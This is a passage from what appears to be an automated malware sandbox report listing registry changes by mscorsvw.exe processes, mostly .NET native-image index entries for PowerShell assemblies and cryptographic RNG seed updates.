"DisplayName" = "Microsoft.WSMan.Management,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\77ef485c\70]
"DisplayName" = "Microsoft.WSMan.Management,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\77ef485c\70\InvertDependencies\34cea914\1285f653]
"67" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "28 E9 28 DA AC 9B 69 7F 94 A2 83 D3 35 C7 07 9B"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\34cea914\1285f653]
"67" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "99"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\77ef485c\70]
"LastModTime" = "50 AB 47 3A 31 74 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\41470f34\2\InvertDependencies\34cea914\1285f653]
"67" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\77ef485c\70]
"SIG" = "EC D0 CD 16 68 09 9B 47 85 11 78 36 0F BB 3D 11"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF C1"

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index61]

The process mscorsvw.exe:3712 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6F B4 70 9F A4 AA 7E 6D 7B B7 08 67 23 6F CA 8E"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:3000 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64\InvertDependencies\182177d0\3319830e]
"5a" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63]
"SIG" = "B7 6F 43 3B 5E 11 DE 4E B3 DF 75 E5 9F 64 67 8F"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\67e63d5c\6\InvertDependencies\182177d0\3319830e]
"5a" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\182177d0\3319830e]
"5a" = ""

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FD"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\77ccecdd\61ffc130\a\InvertDependencies\182177d0\3319830e]
"5a" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\182177d0\3319830e]
"5a" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"ConfigMask" = "4361"
"ConfigString" = "ZAP--0000-0000"
"ILDependencies" = "DD EC CC 77 30 C1 FF 61 0A 00 00 00 03 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63\InvertDependencies\182177d0\3319830e]
"5a" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"DisplayName" = "Microsoft.PowerShell.GPowerShell,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2ffb0c52\5076361\3\InvertDependencies\182177d0\3319830e]
"5a" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63]
"LastModTime" = "7C DE 48 3E 31 74 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\InvertDependencies\182177d0\3319830e]
"5a" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63]
"DisplayName" = "Microsoft.PowerShell.GPowerShell,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\182177d0\3319830e]
"5a" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index60]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FD"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "02 4B 10 B4 3F 40 52 92 46 68 C7 C2 2A 83 35 2A"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"MVID" = "BE 89 7C E6 CB 7D 25 17 02 86 EA BC EA E9 F4 1E"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\67e63d5c\6\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6e35940e\3a9b43f3\4\InvertDependencies\182177d0\3319830e]
"5a" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\268e923b\24\InvertDependencies\182177d0\3319830e]
"5a" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "96"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index60]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5e]

The process mscorsvw.exe:2784 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"DisplayName" = "Microsoft.PowerShell.Editor,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\51be0150\645507bd\5d\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"ILDependencies" = "DD EC CC 77 30 C1 FF 61 0A 00 00 00 03 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F9"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\268e923b\24\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"ConfigString" = "ZAP--0000-0000"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2ffb0c52\5076361\3\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6e35940e\3a9b43f3\4\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5f]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F9"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\77ccecdd\61ffc130\a\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5f]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FD"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"ConfigMask" = "4361"
"MVID" = "72 A5 E7 88 C4 07 6B 67 EC 68 97 DA DB 9C 00 B6"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FD"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0F 70 A8 DD BF 27 CD 33 6A 18 84 4E 02 2F CC DB"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"DisplayName" = "Microsoft.PowerShell.Editor,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"LastModTime" = "EA DF 29 3E 31 74 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206\b\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"SIG" = "EC 74 C4 48 ED 80 64 4D BD A4 D7 78 32 8C 96 D8"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "95"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d]

The process mscorsvw.exe:1632 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "21 42 59 38 E2 80 53 DB 13 C3 5E 72 34 15 16 D1"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:2208 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\7ac727df\3ef4663b]
"F" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ConfigMask" = "4361"
"DisplayName" = "Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"SIG" = "EC BB F6 79 DE 07 9A 4F A7 CE DF 48 D6 49 CE 93"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ConfigString" = "ZAP--0000-0000"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"LastModTime" = "02 39 F4 39 31 74 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\3ef4663b\f\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\7ac727df\3ef4663b]
"F" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"DisplayName" = "Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DA D5 9B 5D 30 97 EC EF 31 BD 06 EB 00 16 7F 0A"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "91"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"MVID" = "13 FC 3D AE F5 85 09 8F 11 91 1F 8F 72 AC 1C EA"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\7ac727df\3ef4663b]
"F" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index59]

The process mscorsvw.exe:3252 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C3 2C F4 8B 30 2E A1 2B DB 56 BF 67 4E 73 D8 A3"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:2348 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"MVID" = "F0 07 EE 1B F5 48 BA 76 1B A6 16 F4 C3 5B 15 8E"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\6abb48d8\39\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\41470f34\2\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\168b424e\2b\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"DisplayName" = "Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ConfigString" = "ZAP--0000-0000"
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"SIG" = "1D 3D FC F9 F8 82 BC 47 B7 60 1D 39 80 29 76 15"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"DisplayName" = "Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF E1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF E1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DF 36 3C A9 5D 41 E1 EC B5 F9 30 F8 D6 5E D9 7D"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ConfigMask" = "4361"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "92"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"LastModTime" = "06 7A 73 39 31 74 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\638045d1\2c\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]

The process mscorsvw.exe:3972 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3C 09 7F 58 A0 33 C0 CE A0 92 7F 98 9C 5A A7 7C"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:2176 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A5 23 0F EF 58 B8 62 3F FB 63 D1 91 7C BC 74 DC"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:2748 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BD F9 EA 0E 7D EC AF FC FE FC D7 1C 44 C9 D4 66"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:2264 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C9 FB 8E 9D 4F 36 91 72 AE 49 4C 1E F0 0C 48 71"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:3668 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

